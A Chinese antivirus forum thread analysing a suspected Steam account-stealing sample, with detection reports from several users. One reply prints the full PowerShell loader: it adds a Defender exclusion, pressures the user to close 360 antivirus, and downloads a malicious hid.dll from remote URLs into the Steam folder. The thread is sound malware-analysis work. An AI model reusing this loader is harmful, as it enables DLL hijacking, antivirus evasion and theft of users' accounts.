查看: 858|回复: 12
收起左侧

[可疑文件] 疑似Steam盗号脚本及其下载产物

[复制链接]
僅此而已
发表于 2024-3-25 12:45:24 | 显示全部楼层 |阅读模式
密码infected
已测Windows Defender/EIS均未报毒
实体机验证在Steam目录下会多出一个hid.dll,打开Steam后会尝试访问以下地址
  1. new-service和谐biliapi和谐net
  2. steamruna和谐oss-cn-guangzhou和谐aliyuncs和谐com
复制代码
第一个地址浏览器访问时ESET弹出警告

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
祸兮福所倚
头像被屏蔽
发表于 2024-3-25 13:03:54 | 显示全部楼层
本帖最后由 祸兮福所倚 于 2024-3-25 13:07 编辑

360kill小Amiss

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
偶偶偶114514
发表于 2024-3-25 13:04:27 | 显示全部楼层
本帖最后由 偶偶偶114514 于 2024-3-25 13:07 编辑

di:pua(dll)
深信服阻断可疑ps1
2156
发表于 2024-3-25 13:05:25 | 显示全部楼层

avira

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
GDHJDSYDH
发表于 2024-3-25 13:15:26 | 显示全部楼层
卡巴扫描miss

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
fever腾腾
发表于 2024-3-25 13:37:09 | 显示全部楼层
毒霸 miss
DisaPDB
发表于 2024-3-25 13:54:53 | 显示全部楼层
本帖最后由 DisaPDB 于 2024-3-26 19:43 编辑

又是这种替换hid.dll文件实现假入库的
  1. $localPath = Join-Path $env:LOCALAPPDATA "steam"
  2. $steamRegPath = 'HKCU:\Software\Valve\Steam'
  3. $steamPath = ""

  4. function Remove-ItemIfExists($path) {
  5.     if (Test-Path $path) {
  6.         Remove-Item -Path $path -Force -ErrorAction SilentlyContinue
  7.     }
  8. }

  9. function ForceStopProcess($processName) {
  10.     Get-Process $processName -ErrorAction SilentlyContinue | Stop-Process -Force -ErrorAction SilentlyContinue
  11.     Start-Sleep -Seconds 2

  12.     if (Get-Process $processName -ErrorAction SilentlyContinue) {
  13.         Start-Process cmd -ArgumentList "/c taskkill /f /im $processName.exe" -WindowStyle Hidden -ErrorAction SilentlyContinue
  14.     }
  15. }

  16. function CheckAndPromptProcess($processName, $message) {
  17.     while (Get-Process $processName -ErrorAction SilentlyContinue) {
  18.         Write-Host $message -ForegroundColor Red
  19.         Start-Sleep 1.5
  20.     }
  21. }

  22. $filePathToDelete = Join-Path $env:USERPROFILE "get.ps1"
  23. $desktopFilePathToDelete = Join-Path ([System.Environment]::GetFolderPath('Desktop')) "get.ps1"
  24. Remove-ItemIfExists $filePathToDelete
  25. Remove-ItemIfExists $desktopFilePathToDelete

  26. # 确保结束steam.exe进程
  27. ForceStopProcess "steam"
  28. if (Get-Process "steam" -ErrorAction SilentlyContinue) {
  29.     CheckAndPromptProcess "steam" "[请先退出 Steam 客户端]"
  30. }

  31. if (Test-Path $steamRegPath) {
  32.     $properties = Get-ItemProperty -Path $steamRegPath -ErrorAction SilentlyContinue
  33.     if ($properties -and 'SteamPath' -in $properties.PSObject.Properties.Name) {
  34.         $steamPath = $properties.SteamPath
  35.     }
  36. }

  37. $hidPath = Join-Path $steamPath "hid.dll"
  38. $hidcPath = Join-Path $localPath "appdata.vdf"
  39. Remove-ItemIfExists $hidPath

  40. function PwStart() {
  41.     CheckAndPromptProcess "360Tray*" "[请先退出360安全卫士]"
  42.     CheckAndPromptProcess "360sd*" "[请先退出360杀毒]"

  43.     try {
  44.         if (!$steamPath) {
  45.             return
  46.         }

  47.         if (!(Test-Path $localPath)) {
  48.             New-Item $localPath -ItemType directory -Force -ErrorAction SilentlyContinue
  49.         }

  50.         $catchPath = Join-Path $env:LOCALAPPDATA "Microsoft\Tencent"
  51.         Remove-ItemIfExists $catchPath

  52.         try { Add-MpPreference -ExclusionPath $hidPath -ErrorAction SilentlyContinue } catch {}

  53.         foreach ($file in @("version.dll", "user32.dll")) {
  54.             $filePath = Join-Path $steamPath $file
  55.             Remove-ItemIfExists $filePath
  56.         }

  57.         $downloadData = "https://openai-75050.gzc.vod.tencent-cloud.com/openaiassets_a29b7e99f734fe5de04592ae7a85b8cc_469401708849154509.pak"
  58.         $downloadLink = "https://openai-75050.gzc.vod.tencent-cloud.com/openaiassets_e6d9707966d13169268e57c67783a8fd_469401708839251548.pak"

  59.         Invoke-RestMethod -Uri $downloadLink -OutFile $hidPath -ErrorAction SilentlyContinue
  60.         Invoke-RestMethod -Uri $downloadData -OutFile $hidcPath -ErrorAction SilentlyContinue

  61.         $steamExePath = Join-Path $steamPath "steam.exe"
  62.         Start-Process $steamExePath
  63.         Start-Process "steam://"

  64.         Write-Host "[连接 Steam 激活服务成功,请重新登录 Steam 来激活]" -ForegroundColor Green
  65.         Start-Sleep 5

  66.     } catch {
  67.     }
  68. }


复制代码
PwStart检查并提示用户关闭360安全卫士(360Tray*)和360杀毒(360sd*)。 若$steamPath未设置(即未找到Steam安装路径),则返回,不进行后续操作。 创建$localPath目录(%LOCALAPPDATA%\steam)。 删除%LOCALAPPDATA%\Microsoft\Tencent目录。尝试将$hidPath添加到Windows Defender的排除列表。 除Steam安装路径下的version.dll和user32.dll文件。 从两个远程URL下载文件到$hidPath和$hidcPath。启动Steam客户端(steam.exe)及Steam URL协议(steam://)。输出提示信息,告知用户已成功连接Steam激活服务,建议重新登录以激活,并暂停5秒。
hhhq316
头像被屏蔽
发表于 2024-3-25 14:16:06 | 显示全部楼层
安天

放行后

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
LeeHS
发表于 2024-3-25 16:23:10 | 显示全部楼层
crowdstrike 解压杀
路人—未注册
发表于 2024-3-25 17:29:02 | 显示全部楼层
解压杀
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-28 06:39 , Processed in 0.133369 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表